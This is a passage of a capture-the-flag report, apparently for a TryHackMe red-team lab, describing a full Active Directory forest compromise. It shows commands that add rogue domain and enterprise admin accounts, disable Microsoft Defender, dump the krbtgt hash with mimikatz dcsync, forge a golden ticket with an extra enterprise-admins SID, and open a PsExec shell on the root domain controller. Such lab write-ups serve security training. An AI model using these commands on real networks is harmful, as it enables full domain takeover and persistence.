ChrisPritchard/ctf-writeups/tryhackme-rooms/red-team-capstone-challenge/report.md

 To gain direct access to the DC, a new user was created: `net user aquinas [redacted] /add` plus `net group "Domain Admins" aquinas /add`.
 This allowed the consultant to remote on to the domain with `proxychains remmina` or by opening a remote desktop session from the existing session on WRK1.

+Running the powershell command `Get-ADTrust` from the CORPDC revealed that CORP.THERESERVE.LOC was in a BiDirectional trust with THERESERVE.LOC, the Root domain of the forest (which also included BANK.THERESERVE.LOC, unreachable from CORP).
+As the consultant had domain admin rights, it should be possible to forge a golden ticket with the extra SID of the enterprise admin's group from THERESERVE, granting access to the root domain.

+To do this required the use of mimikatz, which by default is blocked by most competent antivirus solutions and definitely by Microsoft Defender.
+However, as admin on the CORPDC, the consultant was able to disable AV with the following command: `Set-MpPreference -DisableRealtimeMonitoring $true`.

+Uploading mimikatz, in order to get a golden ticket granting access to the root domain, the following steps were done:

+- first, the SID of the CORP domain and root were gathered, via `Get-ADDomain` and `Get-ADDomain -server 10.200.116.100`
+- next, the NTLM hash of the krgtgt user for CORP was gathered, via in mimikatz: `lsadump::dcsync /domain:corp.thereserve.loc /user:corp\krbtgt`
+- finally, a golden ticket was forged with `kerberos::golden /user:aquinas /domain:corp.thereserve.loc /sid:[CORP_SID] /krbtgt:[KRBTGT_HASH] /sids:[ROOT_SID]-519 /ptt`

+Note the use of -519 at the end of the ROOT_SID - this is the SID of the enterprise admins group.
+By executing the above command a golden ticket was created for the user aquinas granting access to the Root domain; this could be verified by running outside of mimikatz: `dir \\rootdc.thereserve.loc\c$` and seeing the file listing.

+To gain remote command execution, [PsExec from Systools](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) was used: `.\PsExec.exe -accepteula \\rootdc.thereserve.loc cmd`, which opened a command shell.
+To complete the compromise, a user was created (`net user aquinas [REDACTED] /add` again), and added to the enterprise admins group directly with `net group "Enterprise Admins" aquinas /add`.
+The consultant could then remote desktop direct to the root domain controller, proving compromise of the entire forest.

 ## Stage 4: Access to the Swift system and demonstrating impact

 ## Summary & Recommendations